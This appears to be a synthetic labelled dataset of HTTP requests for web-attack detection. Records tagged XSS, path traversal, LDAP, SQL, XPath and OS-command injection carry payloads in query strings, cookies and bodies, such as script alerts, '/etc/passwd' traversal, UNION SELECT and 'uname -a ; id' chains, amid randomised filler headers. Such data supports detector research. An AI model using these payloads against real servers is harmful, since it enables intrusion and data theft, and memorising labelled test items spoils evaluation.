ETag: W/"3kRuzq0FRiehv2hZ.4"
Expect: 100-continue
If-Modified-Since: Sun, 15 Mar 09 15:23:15 UTC
If-Unmodified-Since: Sat, 29 May 04 24:32:27 GMT
If-None-Match: "E_yQGn3cE93KGQyAV"
If-Range: Thu, 17 May 07 12:30:53 GMT
Max-Forwards: 2656
Proxy-Authorization: i3sd nmHattte=Gnylo
Authorization: Digest nc=ac4Fa0bE
Referer: http://www.vA1emle.it/efde.mspx
TE: gzip
User-Agent: oqZKoSp1 http://www.Htmet.be
Transfer-Encoding: gzip
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40180
Start - Id: 47801
class: XSS
GET /5uGm_bYnaK2QS2D4/8actLsryd6rs/suixtehranec36Fspe/Arhaftl.jpg?TYJzVfrom9=%3Cscript++++%3Ealert+++%28ej6u1.we1t%29%3C%2Fscript%3E&hmshes=%27golM&Xp8cfrJzAX=eC%260tmayd&4rDKZydumeta4=hsd2 HTTP/1.1
Host: 52.5.109.25:80
Connection: myie0E
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 19.80.216.59
Cookie: 9kzl=oii;ie3ensee17se=2;aijbao=c@rkHobrs yesn 
Cookie2: $Version="437"
Date: Sat, 09 May 09 19:56:24 GMT
ETag: W/"jgC-8NRikg5ooYRuYC"
Expect: 100-continue
From: abl8eEs@dtibtid.ch
If-Modified-Since: Tue, 08 Nov 05 06:08:54 CET
If-Unmodified-Since: Thu, 16 Aug 07 21:31:50 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 30 Jun 05 01:55:48 UTC
Max-Forwards: 0930
MIME-Version: 8.3
Pragma: sscO=tjanyfFo
Proxy-Authorization: Digest username="oaid"
Authorization: Digest username="eoith"
Range: 944229-6,250-
Referer: http://www.hrhreos.gov/oyacjkdp/4nnemi/a2ue/Srfi.jpg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.8 (Windows; U; Windows NT 1.5; a4-en; rv:0.3.3) Gecko/06873319
UA-CPU: x86
UA-Disp: 184,045,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5941x524
Via: 6.4 178.185.206.62, 5.3 www.hse1au.css:21, 4.1 www.lZysch.gif
Transfer-Encoding: compress
Upgrade: thgmp/3.3, cwanec/6.4
Warning: 828 187.164.150.25 "gathtunnr5k6dxt7" "Sat, 23 Apr 05 07:02:53 UTC"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47801
Start - Id: 46235
class: PathTransversal
GET /wEDUkw8u.j/siaoEe8rhmt/ae/vwngPh2zEW/tamY8Lz2YM0vI4HQDVb/ratsP8OstanHtr8/hree1jhkywtnaripuicn.css?jgg=axeoynxi&enbtFtlhi9iN=%2Fetc%2Fpasswd&anme=O1Oeotot%3Fc4%5Di HTTP/1.1
Host: 145.209.178.105
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.3
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 239.42.171.202
Cookie: hta=792;9pr8ctgds3eh=sWu&m(;nx=qSev >klc
Cookie2: $Version="8"
Date: Sun, 23 Mar 08 08:26:23 CET
ETag: W/"yMpHQWskc4VwTC_CTlsa"
Expect: eoetAt
From: eftra@neleobejy.com
If-Modified-Since: Mon, 16 May 05 16:44:28 GMT
If-Unmodified-Since: Wed, 18 Feb 09 19:53:57 CET
If-Match: "sbc94y7.K7rZN.IEdv"
If-None-Match: *
If-Range: "obeLxAKivl4.Yg2Y"
Max-Forwards: 07
MIME-Version: 1.9
Pragma: mufwak4='nomaNto'
Proxy-Authorization: NTLM Y0xkbm54c2t5dGV3Y3JucGllb3NIYW55RWlpdWVucm5hdGV0c2VndWhlc21yb3Q=
Authorization: NTLM aWlvNG5lYXJzMmlvZGl0bmNsdXRhbWFIdTFpYWlwYW1vZWJlYWRuMG5kczg=
Range: 173-
Referer: http://www.grLbn0.be/nEHo/1nAeewo.zip
TE: deflate,gzip;q=0.8,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.5 (X11; U; Linux i386 9.5; nh-bf; rv:2.0.2) Gecko/73019326
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 4.0 www.uonlepr.css, wtegn/3.3 228.180.58.123
Transfer-Encoding: o5tst; thmi0=tvxnoz
Upgrade: Sdb/4.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46235
Start - Id: 37541
class: LdapInjection
POST /mr5/dgK/bgRiggzoInrO2an7ace/nl/osAirnph2u/ehcoiHcxx0el/swsysteml1perlslS.exe? HTTP/1.1
Content-Length: 324
Content-Language: hsrc
Content-Encoding: deflate
Content-Location: http://gDio9oo.biz/itwts/Tt8r/s1yqt0ih.gz
Content-MD5: dGhsZW53NDgyOGNOczhzYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: www.ohbPeursnj.it
Connection: YefEq
Accept: video/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: i-tdeead;q=0.1, ikr-fia;q=0.8, nefIioe-no5ya, td-BiCns;q=0.0, hEohaid-epeiooen
Cache-Control: max-age=2963
Client-ip: 75.168.219.135
Cookie: hshbenos=jboot.iniD;6DrrETTua=niaehst cb;N3crfhnIlpz=1Sies;utaUeaiaA=aatpanaici0
Cookie2: $Version="00"
Date: Tue, 23 May 06 12:58:52 UTC
ETag: "Mxlw8QKTPVHrsMxP"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: *
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: *
Max-Forwards: 1070
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: edssen gudohr1a=luooomT
Range: 0516-7855,069180-,334-
Referer: /dde7/fwhaeo5i/ewhch/uterA.aspx
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/6.0 (compatible; ohohahaaie; Solaris; 2ewotE; teara1a)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: dqhx/9.3 www.3aosh.html, 9.7 www.afuRoia.png
Transfer-Encoding: deflate
Upgrade: uTzmh/1.6, onhq/1.4, ecsat6/1.2, etDno/7.8
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oe6bsiOitcrbch=niuee7SepsyS&urpehht=qe&aotcialiyr=ei7XKoXZzCf&iomlfy=8016&ErtT=6&seeRkeeea=rtvbropeneu /e&om8d=aYMYstSX9ZLh&nj8iowUitRS=472&nlovrch7OirCe=972)(&(objectClass=Ysto)(|(sn   = ito)(cn=uom     J*))&ahtI18dyxs=rrzwygL&m1opoh=hb62wdylq9Xu&OZFrf=2261710&ropasswd3SLX2sQ2=usspz1tSamrte

End - Id: 37541
Start - Id: 43195
class: OsCommanding
GET /eb/eE.Bclrl/7fAjod8oht.png?co5=a5zl8u8zy&J1xp_l9t4%uYu.nph-=psyve&lAmc6Cylmlh=wr&ihmeAiflr=mail+++ipBesd%40tjddcOd.osxp.gov+++%3C%3C+++%2Ftmp%2Fwu.c%3B&Ital01Alueabo=et8i7awlkis HTTP/1.1
Host: 42.55.96.40
Connection: close
Accept: */*
Accept-Charset: gb2312;q=0.5, windows-1251;q=0.1, windows-874, iso-8859-15, x-mac-arabic
Accept-Encoding: deflate;q=0.6, identity;q=0.6, identity;q=0.8, deflate;q=0.4, deflate
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 157.236.28.151
Cookie: tTroethit=o Sac;gusrv4CafKx2=356;z8tboot.inimrMtJHbH=$tmp5;afnothiiqotel=ncqi5
Cookie2: $Version="9"
Date: Sun, 18 Apr 10 22:25:44 CET
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: 100-continue
From: caRsu@eRisrtRCa8.st
If-Modified-Since: Sat, 10 Sep 05 23:48:37 UTC
If-Unmodified-Since: Sun, 25 Apr 04 08:46:52 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Nov 08 17:49:29 GMT
Max-Forwards: 4
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Digest nonce
Range: 3473-351,462906-
Referer: /nithtdia/xae9t/rzya0/wuts/eht8h.gz
TE: chunked
Trailer: Authorization
User-Agent: esnchxtC (i1msmILp; hxq3VT6SE3; ru1slbRhOM; clASQUECb)
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 953x846
Via: ttpdeu/3.1 138.106.153.152, 4.3 22.237.198.104
Transfer-Encoding: compress
Upgrade: hi11/1.2
Warning: 407 143.65.197.47 "assaq" 
X-Forwarded-For: 64.137.223.100
X-Serial-Number: 3512760212193
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43195
Start - Id: 42116
class: SqlInjection
GET /QjaqUtW/eMfHinclude/kkInWPj1t5S/ysYUDBjeAXbN6zsK8vm/Waccess_logbn0gFiRq/eNKU/andanz7t0nraa9oea/jSZfH7e0iNpolrA/o5Si8/es2B5qO/ViXopenQJ/eldt4lAteoir.jpg?lDs2d6Eit=tdaccess_log8awa%27slftl&rxSohgA=406&mIe=%27+++++or++id+++++in+%28+select+*+++from+++++user_db+++%29&IteROyesr=43621819 HTTP/1.1
Host: 160.201.160.231
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3
Accept-Encoding: 
Accept-Language: necik4-jawo, dfuue-teyjaee;q=0.1, t-mYa, rtr7telf-2ne;q=0.8, lest-cowa73;q=0.7
Cache-Control: s9E7d=tinao9
Client-ip: 123.133.143.196
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="34"
Date: Tue, 06 Apr 10 15:19:16 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: 100-continue
From: jqr1h@steT4irua.uk
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Fri, 21 Mar 08 17:55:01 CET
If-Match: "KmL6w.ReBGH8FP51tWr"
If-None-Match: "EFDCd3IKj7.--jOC"
If-Range: Sun, 07 Jun 09 13:42:18 GMT
Max-Forwards: 43
MIME-Version: 8.4
Pragma: ej5Q=wnota
Proxy-Authorization: nds34g oiEb=r4tb
Authorization: Digest realm
Range: 80-3804,023297-91,09-
Referer: http://uTLni.it/oauz/psenuqht/nolslcnl/ea1fOawv.shtml
TE: gzip,gzip
Trailer: Proxy-Authorization
User-Agent: micam1pta2/3.3.1.4.5
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 051x7587
Via: 4.6 241.194.76.226
Transfer-Encoding: identity
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42116
Start - Id: 36967
class: LdapInjection
GET /dDyOHG6I7Za8tPF7y/64aT3to.FTlWMu2ccK/r3RJz.g94uGOuS151/leos81a4e/ncNZ_UGXG8VwB9fH-1h/56zqKIEB.@cWM/ldc75/oeaao1raxnid.asmx?Re9wtreunonh=1TpdHOrJ&esoReOsI7roeuft=c&hh2ftru=ett8trnrb&ombeivo=pU1aPXLo0a&rxt4ssipA=tsh&YXwIXsammzho90=eHcb6&siMaurrttt=7qnsc%5D+dpoTi+&FtX@dNc4D=tdWhqAyO&ENeeD=eiC2&pei=%29+++%28+++%7C%28++++cn%3D*o%27brien*+++%29%28mail++++%3D*o%27brien*++++%29+++&VIYEw17Ho_bO=m1 HTTP/1.0
Host: 29.167.149.173
Connection: close
Accept: image/*;q=0.7, video/*
Accept-Charset: iso-2022-kr;q=0.2
Accept-Encoding: 
Accept-Language: txY2ieh4-nciNmlog;q=0.2, s-g, 1onla-7t1bEiw;q=0.7
Cache-Control: min-fresh=243
Client-ip: 248.80.57.117
Cookie: ae7=wkxdDF6;deLrel5n5=oev>e e0t;orc2trag=nxM0Vnrn5;0xtelnet-@bJusr=uN;1a4i774=078535
Cookie2: $Version="3"
Date: Mon, 14 May 07 18:48:16 CET
ETag: "-VzvVFgTnT9xXlM"
Expect: 100-continue
From: ooeh@nqieoausen.gov
If-Modified-Since: Sat, 27 May 06 05:43:22 UTC
If-Unmodified-Since: Sat, 13 Jun 09 24:54:14 CET
If-Match: "XQdXfvq.3bE@IFjdV"
If-None-Match: "b81RCllo4JeISay"
If-Range: Sat, 06 Aug 05 17:22:10 CET
Max-Forwards: 26
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="cttu"
Authorization: Digest algorithm=MD5
Range: 84-,-422477,1197-5319
Referer: /teati/Cowu3ii/onrnyue9/obAid/s4uE4hz3.asmx
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/5.0 (compatible; Konqueror/7.5; Windows NT; cnono; sfrfa)
UA-CPU: Sparc
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Transfer-Encoding: gzip
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 36508239
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36967
Start - Id: 42748
class: SqlInjection
POST /lyT707Ep5U2xtvu680I/qs7aAfVfGtLQXOc/dody/p83ee/t_Qv7/njjco9O578nG@pjv/stylehPQ0vtk.tiff? HTTP/1.0
Content-Length: 117
Content-Language: h,csotn
Content-Encoding: deflate
Content-Location: /eicN.js
Content-MD5: dGlldDNyZUVsaXVybmh3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Apr 06 02:28:25 UTC
Last-Modified: Tue, 17 Apr 07 17:02:03 CET
Host: 168.117.197.28:61
Connection: close
Accept: image/*
Accept-Charset: windows-1250;q=0.3, x-mac-icelandic;q=0.7
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=13
Client-ip: 124.45.10.36
Cookie: iigdsnnsu5su5tt=' ) UNION     ALL  SELECT 530 FROM   ogz  WHERE  (  ''    = ';xyt3tn9NndDen=frgtw8o;Y6c-ujUwxQ4f=ehttpsnullbl3r5t 
Cookie2: $Version="3"
Date: Sat, 14 Jun 08 11:18:37 UTC
ETag: ".PfM8yl8kQplznBvnH"
Expect: 100-continue
From: olec@itnahevEod.st
If-Modified-Since: Sun, 09 Apr 06 10:13:44 GMT
If-Unmodified-Since: Mon, 10 Nov 08 13:13:41 GMT
If-Match: "9Arc_SaW6tEqqCJF75ss"
If-None-Match: "KX3vhRmNXBgH660ft"
If-Range: "oKTT4u2oxG31aKWSnN"
Max-Forwards: 4
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: iurtN aqadDau=s2ape
Authorization: eeUKkv AhoaSg=ie3L
Range: -47883,920284-33663,-174
Referer: /dmab9/nerno/bh2ae.tar
TE: gzip;q=0.2,gzip;q=0.4
Trailer: Pragma
User-Agent: Mozilla/0.7 (Machintosh; U; PPC Mac OS X 6.7; fs-Sn; rv:2.6.8) Gecko/62220145
UA-CPU: StrongARM
UA-Disp: 9938,911,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 301x5874
Via: 9.8 155.22.224.38:3, 7.9 7.216.100.48, co8/3.8 222.130.241.75
Transfer-Encoding: gzip
Upgrade: pIH2t/5.2, nJs/4.7
Warning: 659 226.226.230.165:60604 "TKats3angumn" 
X-Forwarded-For: 133.180.69.1
X-Serial-Number: 982370510860672166
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

nKy7binI1vOF5Y=eee5i&ntudsseughhn=az]i]accepta&jconnect-Z=lzigecsm&qRuvchaPrjms=0mhU5p_W&nep=t&eitan1djbMiu=Lhuds

End - Id: 42748
Start - Id: 48226
class: XSS
PUT /nesl/in1.CRyobject/-Eu1or/bphlVGeI/ajhaGF6xjxKWB/ujH.ZqgN/lpistss7stho/U0/bfOykaEGMVW9A/nrwAEnawftlhe.css? HTTP/1.1
Content-Length: 160
Content-Language: 9doo,oo
Content-Encoding: compress
Content-Location: http://www.xRnypnex.be/ophn/0eI6tNps/hocinf/teedsh/r3ydar.avi
Content-MD5: ZXN0aXNSOG9scmtocGhjYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Nov 04 12:33:51 UTC
Last-Modified: Sat, 26 Feb 05 18:32:03 UTC
Host: 225.209.33.109:80
Connection: keep-alive
Accept: image/png;q=0.0, video/*;q=0.8, audio/*
Accept-Charset: windows-1251;q=0.7, iso-8859-6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 242.73.87.196
Cookie: lcwa=0bc     onload=javascript:  alert (eqde0.qshltc4m);Poe8bL3irZ=16;.p-EVqsU75k=48113;erux0ldeit=e;oesnePvrsbn=eia:5s5l$RmNatmp|nxterm l:;s0contg=62837
Cookie2: $Version="638"
Date: Sun, 15 Feb 04 16:21:16 GMT
ETag: W/"cpFzrcC@6hyaKzz"
If-Modified-Since: Sun, 17 Jun 07 13:18:54 UTC
If-Unmodified-Since: Sun, 05 Nov 06 19:50:51 CET
If-Match: "p8m7d-.-9UIz6JuHANB"
If-Range: *
Max-Forwards: 40
Pragma: eaa2='sresoeno'
Authorization: Digest response="9Fa1AF78AFCAADC5CEa0ACE3f0e14Bd0"
Referer: /e1Pl/otjeaurs.cgi
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 2.2; 9c-Ex; rv:4.3.8) Gecko/62708124
UA-Pixels: 1593x216
Via: FTP/3.5 213.230.49.85:374, 1.1 www.ded7.js:37
Transfer-Encoding: fihia; entet7ap=Jrrgm
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yKrz3DlocationXIBOo=dKTJlfGgZ7&ye=Tce sam&trei5&temilHoczle=51896&s0=460250&Eneuintrynepywh=ehxg childsbth)toamb&hlazlhslres=4tlikey~eu@wrn+ eodelete8

End - Id: 48226
Start - Id: 43561
class: OsCommanding
GET /7position3/7epdioaham/pwWalOKIvQ/nfssno/hpgK2.a/tVs7lIrnIZiur8map/qf.mdb?o6az3=aEP9jAmzsoN&tAnjvtsa3=eeacgtoilcmdz&Gbody4.Y2=i2f&tobe8r1=sYc&Q1O-hH2=tDML_vVzo&ahrfna=77944&reemd=tE&sffspktIi2xg=15269974&epsthhc=+++++%3B+++echo+++++%3Bw+%3B+++uname+++++-a++%3B+id&iapnou=psiheilblsectul&PbNdmafufioy=9ed%2B24openpasswdA-n0d HTTP/1.0
Host: 61.109.44.148
Connection: sc0abh
Accept: application/rtf;q=0.7, audio/x-wav, audio/basic;q=0.3
Accept-Charset: x-mac-japanese;q=0.6, utf-8;q=0.0
Accept-Encoding: 
Accept-Language: a-euudndt7
Cache-Control: no-transform
Client-ip: 214.70.1.175
Cookie: dsdlaaLoee=R&n;tiqhfhnHuaaw=3338507827;xuaefe=asBeaVhncdeuic1us
Cookie2: $Version="2"
Date: Sat, 19 Aug 06 23:58:42 CET
ETag: W/"5iLoNVknU2PXMAfL"
Expect: 100-continue
From: enle@ymn9end.uk
If-Modified-Since: Thu, 02 Feb 06 24:52:44 CET
If-Unmodified-Since: Sat, 10 May 08 24:55:54 CET
If-Match: *
If-None-Match: "xda6ERacz_uD_f3R.sJ"
If-Range: "C1kWf46WRO5ZKpstLzi@"
Max-Forwards: 3
MIME-Version: 7.0
Pragma: in=eeY3titb
Proxy-Authorization: szoGA tiskrnt=veetaa
Authorization: dprin7 woie=reEn
Range: -262090,-9
Referer: /p2iooh/eefsd/npermhf.swf
TE: deflate,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.1 (compatible; oemdu7utjn; Open BSD i386; miaz6thlm; exnae)
UA-CPU: x86
UA-Disp: 1895,188,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: FTP/0.1 99.210.176.60, 1gh/9.6 66.137.93.84
Transfer-Encoding: identity
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 5097716489004151
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43561
Start - Id: 39068
class: LdapInjection
POST /l5gGMHWQh8PnmAqoWx/teswoefts/ofC4Ix1q3zPGMRRYPX.css? HTTP/1.1
Content-Length: 50
Content-Language: e,e,hierend
Content-Encoding: identity
Content-Location: /eucekcdl.mpeg
Content-MD5: ZXJkdEN1YW5nc282aWVvbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Jan 05 20:31:17 GMT
Last-Modified: Tue, 15 Dec 09 08:47:39 GMT
Host: 121.40.197.209
Connection: keep-alive
Accept: audio/x-wav;q=0.1
Accept-Charset: x-mac-arabic;q=0.1, windows-1252, windows-1251, x-mac-icelandic;q=0.1, windows-1255;q=0.8
Accept-Encoding: *
Accept-Language: WtCCAs7-dor
Cache-Control: only-if-cached
Client-ip: 137.169.113.69
Cookie: chl8ttiEs8rq9gH=twt mailapnetcd ;tIt2ioukr=rdo;aeat=4so-nd%leM;sperlOK7=isuioty7mtrhflt;cymyEl0ieyne=li8uwidstrezhk;zld=ytpo)(    |   (rf2=*)
Cookie2: $Version="868"
Date: Fri, 15 Apr 05 17:22:16 UTC
ETag: ".0u_z.AlvPuA9LK6LDW"
Expect: hit8O3n=ennhs;srMiqRo=qddrso
From: ct0nt@neotdaE7.cz
If-Modified-Since: Fri, 26 May 06 03:35:28 CET
If-Unmodified-Since: Tue, 26 Jul 05 22:04:41 GMT
If-Match: "4_tkTExPXH4pAU3CHDa"
If-None-Match: *
If-Range: Sun, 08 Jul 07 12:36:11 GMT
Max-Forwards: 338
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="bc4244b1f0ed32c2C5fBb2dF8b3fa903"
Authorization: ssrmue tteeEedH=ieyroaq
Range: 4-036093,-25292
Referer: http://else.ch/m0utn.css
TE: gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 2.9; vt-lv; rv:3.6.0) Gecko/61028714
UA-CPU: MIPS
UA-Disp: 7404,0274,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0434x6105
Via: eec/0.6 192.97.196.18, 2.7 www.igailfFw.htm
Transfer-Encoding: gzip
Upgrade: oe8sa5/3.6, asot/7.7, vIoul/0.4, Oitiff/6.5
Warning: 543 www.edobgt0.js "lcowdr5ilNc" "Thu, 29 Dec 05 20:06:59 GMT"
X-Serial-Number: 53018392304378
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

twfemeoul=3&t2e=dAHyMVHdqfy5&ssOeFtguciherdR=10774

End - Id: 39068
Start - Id: 46182
class: PathTransversal
GET /Z3J9j2G635/prtpehxoes7rvEet/tfNFhjoPw_5BP-/cN5F@/slk/ox/cEayvtneoht/_n/rel1otaohe438b1oaiEe/owvl/f4PR8bwpAK20qvy.gif?Lcopyyy3EWf=Ixm&ceeAisfe=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&jk=99&T7eedtmLrewuadv=6&uih=62&oTri=905&4eaRe=dtClaeo8d&xBbYTSfk_g=OseOmlt4zner&FWlogLRGsystemES-s=crdtewPHhvr&fenyuaoonsioio=8n4y&1olnjstiscnoin=8671782642&MP2BB=ieexec&qi=tEhVroO HTTP/1.1
Host: www.oewpzr7.cz:80
Connection: close
Accept: text/*;q=0.3, image/jpeg;q=0.9, text/html
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: R-arrS, rte8b-Uce55ad;q=0.1, EgIxn-toanc;q=0.4, nec-stooultd;q=0.0
Cache-Control: no-store
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Tue, 12 Jan 10 09:14:03 CET
ETag: W/"zHp6z1-Anyy.MLyB2IMg"
Expect: 100-continue
From: duvqw@ecyw.st
If-Modified-Since: Thu, 14 Dec 06 06:48:11 GMT
If-Unmodified-Since: Sat, 11 Jul 09 14:39:38 CET
If-Match: *
If-None-Match: "h@BfGwMRw8PxrRQhut"
If-Range: Mon, 02 Mar 09 02:41:46 CET
Max-Forwards: 196
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: 9esi xlsrt=e623
Authorization: Digest response="a9e5F10D9dffdBcbdAD1c7071a9ff3dA"
Range: -423
Referer: http://www.a9Lnnnr.ch/NualiEem/thbOwx6/amticp/zdne8afb/netnb.wav
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: tpssit0/2.9.2
UA-CPU: x86
UA-Disp: 3301,4753,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 292 www.tdsirTm.jpg "oohoctsorndn" "Tue, 29 Dec 09 06:05:50 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 726425305540692
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46182
Start - Id: 49373
class: XPathInjection
GET /EoposPsegeehbe/I@/kPQ0iQW8UL3fg@7py0g/ettlio/sNlt-.zc/ea6Khz/Strahairosq/W64hlg2/apvQ77_LMn@v1Vd8T.jpeg?ue=etht+msbp&etcDvee=ksn0h4&tleKd=gfsnilocationnhtotRb7z&pimfdchpseirzek=YmebuTeuttIk6ns&leiha0pBrrrerac=n3j1br%27++++or+++6++++%3C+count%28path%2Fchild%3A%3A*%29+or+++++%27iueNo0%27%3D++%27&i084els9a0oc=6im%3Aetcepei%2Fes HTTP/1.1
Host: 80.101.201.8
Connection: Mbis
Accept: text/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=4
Client-ip: 23.61.51.54
Cookie: tht=1570;hs=eqeOm;8HL1eRp=8w5inaTnben7etea;fsaxn=asXi;Rs1=nl;aanarftanyt=9084584
Cookie2: $Version="951"
Date: Fri, 01 Jan 10 07:52:34 UTC
ETag: W/"RkLd1rvasZXLUSjf"
Expect: tm7hhlah
From: hzioi@etsrec.cz
If-Modified-Since: Wed, 12 Apr 06 16:45:33 UTC
If-Unmodified-Since: Sat, 10 Feb 07 23:46:37 UTC
If-Match: ".KdGe@w_6u@40HVCjBz"
If-None-Match: *
If-Range: Thu, 07 Jul 05 18:15:28 CET
Max-Forwards: 38
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: NTLM ZXNlZmRldHNzaXd3bDBFMm1yN2VlbmZueXllaXNjbmlsaQ==
Range: 79-,-25900
Referer: /intsbe/oae9/7sms/teEi6s.txt
TE: chunked
Trailer: Pragma
User-Agent: bStWpelsjsl
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0695x2392
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: identity
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 392 www.dbtno.css:44727 "hesiano" "Sat, 28 Jan 06 05:38:19 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49373
Start - Id: 38001
class: LdapInjection
GET /b09sdT83/eCVAsgUJKo/oyH8Us_IxxAoqY/iqhgDePPA.WO2/vee6aSarrmuecn/eN/r5@d7N166.js?LM9ulordhcbTnNu=on&O9n8=ovTqCJUx&nSd2fsjwF=1575176&fs3wstdinD=i%40altfimz48n&vrle=%29+%28%7C++++%28le%3Dxaoo*%29&B6SMioqMw@sn=1311&tereAuoEo=5215710 HTTP/1.1
Host: 81.68.68.253:1
Connection: close
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 206.83.241.99
Cookie: weeejqlsAero=a
Cookie2: $Version="2"
Date: Tue, 17 Jan 06 24:36:52 GMT
ETag: W/"UDst@tJde@GHR5NuG09g"
